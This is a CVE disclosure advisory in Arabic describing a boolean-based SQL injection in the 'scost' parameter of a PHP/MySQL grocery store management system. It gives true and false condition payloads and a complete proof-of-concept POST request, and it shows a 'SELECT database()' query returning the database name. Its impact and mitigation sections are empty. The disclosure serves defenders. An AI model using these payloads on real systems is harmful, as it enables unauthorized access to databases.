
CVE-2026-37149 - ثغرة حقن SQL في المعامل scost في ملف search_products.php في نظام إدارة متجر البقالة باستخدام PHP و MySQL و phpMyAdmin الإصدار 1.0.
CVE-2026-37149 حقن SQL في GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
نظرة عامة
معرف CVE: CVE-2026-37149 نوع الثغرة: حقن SQL (CWE-89) الخطورة: عالية المكتشف: Dhyey Patel
الوصف
يحتوي GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 على ثغرة حقن SQL في المعامل "scost" في "/grocery/search_products.php".
يفشل التطبيق في التحقق بشكل صحيح من الإدخال الذي يقدمه المستخدم قبل تضمينه في استعلامات SQL. يمكن للمهاجم حقن تعبيرات SQL مصممة عبر المعامل الضعيف والتلاعب باستعلامات قاعدة البيانات الخلفية.
قد يسمح الاستغلال الناجح بالوصول غير المصرح به إلى معلومات قاعدة البيانات الحساسة وتنفيذ جمل SQL عشوائية.
المنتج المتأثر
المنتج: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN الإصدار: v1.0 مستودع البائع: https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
المكون المتأثر
نوع الهجوم عن بُعد
معلومات البائع مشروع مفتوح المصدر يديره مالك المستودع: https://github.com/anirudhkannanvp
التفاصيل التقنية
تم تأكيد الثغرة باستخدام تقنيات حقن SQL القائمة على القيم البوليانية.
حمولة الشرط الصحيح
-1 OR 321=6 AND 000483=000483 --
حمولة الشرط الخاطئ
-1 OR 320=6 AND 000483=000483 --
اختلفت استجابات التطبيق بناءً على ما إذا كان الشرط المحقون قد تم تقييمه إلى TRUE أم FALSE، مما يؤكد وجود حقن SQL.
أكدت الاختبارات الإضافية التنفيذ الناجح لدوال SQL بما في ذلك:
SELECT database()
اسم قاعدة البيانات الذي تم إرجاعه هو:
grocery
يوضح هذا أنه يمكن تنفيذ استعلامات SQL عشوائية من خلال المعامل الضعيف.
إثبات المفهوم
الطلب
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
النتيجة
تتغير الاستجابة وفقًا للشرط البولياني المحقون، مما يؤكد وجود حقن SQL في المعامل "scost".
التأثير
التأثيرات المحتملة تشمل:
التخفيف
يجب على المطورين:
المراجع OWASP حقن SQL https://owasp.org/www-community/attacks/SQL_Injection
برنامج CVE من MITRE https://www.cve.org
الاعتمادات اكتشف وأبلغ عن: Dhyey Patel